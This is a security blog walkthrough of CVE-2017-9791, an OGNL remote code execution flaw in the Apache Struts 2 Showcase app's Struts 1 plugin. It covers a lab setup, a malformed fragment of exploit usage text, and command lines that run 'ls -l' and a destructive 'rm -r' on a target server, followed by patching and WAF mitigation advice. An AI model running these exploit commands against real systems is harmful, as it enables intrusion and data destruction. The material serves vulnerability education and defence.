Apache Struts 1-2 Plugin Showcase OGNL Code Execution : CVE-2017-9791 | Video | Lucideus

                                                                        [Difficulty: High, CVSS v3 Score: 9.8 → Critical]



Introduction

A plugin in Apache Struts 1 is available that allows any developer to use the existing Actions of Struts 1 and Action Forms in Apache Struts 2.
A few days back an exploitable advisory - S2-048 was made public by the Apache foundation. It was a possible Remote Code Execution Attack using a malicious field while using that famous Apache Struts 2, Struts 1 plugin. The Remote Code Execution (RCE) vulnerability was reported by Icez, Nixawk, and Xfer0 in Apache Struts2. This vulnerability has been assigned the Common Vulnerability Exposure Number, CVE-2017-9791. The vulnerability which was getting exploited by this bug was the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series uses Object Graph Navigation Language (OGNL) expressions.

The Apache Struts
The very famous Apache Struts framework is majorly used to develop the modern Java-based web applications. Apache Struts is a mainstream web framework. It is widely used by Fortune 100 Companies in multi streams like Education, Government, Financial, Retail, and Media etc. It has released basic 2 major versions, First was the Apache Struts 1 which was initially released on May 2000 and became a top-level Apache project, Second was Apache Struts 2 which first full release in February 2007. They both use multiple plugins to run there functionalities.

Vulnerable Application Framework | Vulnerability Type
Apache Struts 2.3.x before 2.3.32 | Input Validation (CWE-20)

Walkthrough
  • Firstly, need to set up a vulnerable Apache Struts2 web application. The demo Showcase application is available as accessible from here.
  • Downloading the Exploit Script, The exploit is available publically through here: Struts2-048.
  • Download and configure Tomcat 7 on a local server/droplet from here.

Proof Of Concept
  •  Download Struts2-Showcase-2.3.12.war and copy using the following command. 
          # cp ~/Downloads/Struts2-showcase-2.3.12.war /opt/apache-tomcat-7.0.88/webapps/
  • Start the tomcat server by using the below command.
         # /opt/apache-tomcat-7.0.88/bin/startup.sh 
  • Tomcat will automatically deploy struts2-showcase-2.3.12.war by extracting it to struts2-showcase-2.3.12 under web application directory. Further, struts app can be accessed by navigating to the below address as shown below. 
        http://localhost:8080/struts-showcase-2.3.12/showcase.action
  •  Now let's exploit this using the exploit script which is downloaded from GitHub here as shown below.
  • Further, the following changes have to be made to the script for working it out.

def Usage()’

print ‘check:’
print ‘    python file.py http://ip:8080/struts2-showcase-version/integration/saveGangster.action’
print ‘poc:’
print ‘    python file.py http://ip:8080/struts2-showcase-version/integration/saveGangster.action’

Note: We need to change the IP and version according to the victim server configurations.
  • In order to execute the RCE, we need to use following command syntax
          # python scriptname.py http://ip:8080/struts2-showcase-version/saveGangster.action “command”

  • Executions :
The output of a successful execution is shown below.
          # python scriptname.py http://ip:8080/struts2-showcase-version/saveGangster.action “ls -l”
 
# python scriptname.py http://ip:8080/struts2-showcase-version/saveGangster.action “rm -r GotAccess”
 



Conclusion


Apache Struts versions 2.3.x with Struts 1 plugin and Struts 1 action are the reported versions find out to be vulnerable. As a solution, the vendor has basically suggested that the user should always use resource keys instead of passing a raw message to the ActionMessage or use Apache Struts 2.5.x series.

As an alternative to the formal advisory, which could be costly and time-consuming, is "Virtual Patching". Which will help instead of leaving a web application exposed to attack while trying to modify the code after finding a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you’re able to patch them.
As an example of such virtual patch is a Web Application Firewall (WAF), Unified Threat Management System (UTM) etc. that can provide virtual patching. The further advantages of that are as follows:

  1. Doesn’t interfere with the normal application workflow.
  2. Keeps site(s) protected and attackers out of reach.
  3. Allows site owners to control the patching process timeline
  4. WAF such as mod_security could mitigate this attack if the rules are set to whitelist valid content types or blacklist OGNL expressions.
Video PoC


References
  1. https://www.rapid7.com/db/modules/exploit/mult/http/struts2_code_exec_showcase
  2. https://www.exploit-db.com/exploits/44643
  3. https://nvd.nist.gov/vuln/detail/CVE-2017-9791
  4. https://cwiki.apache.org/confluence/display/WW/S2-048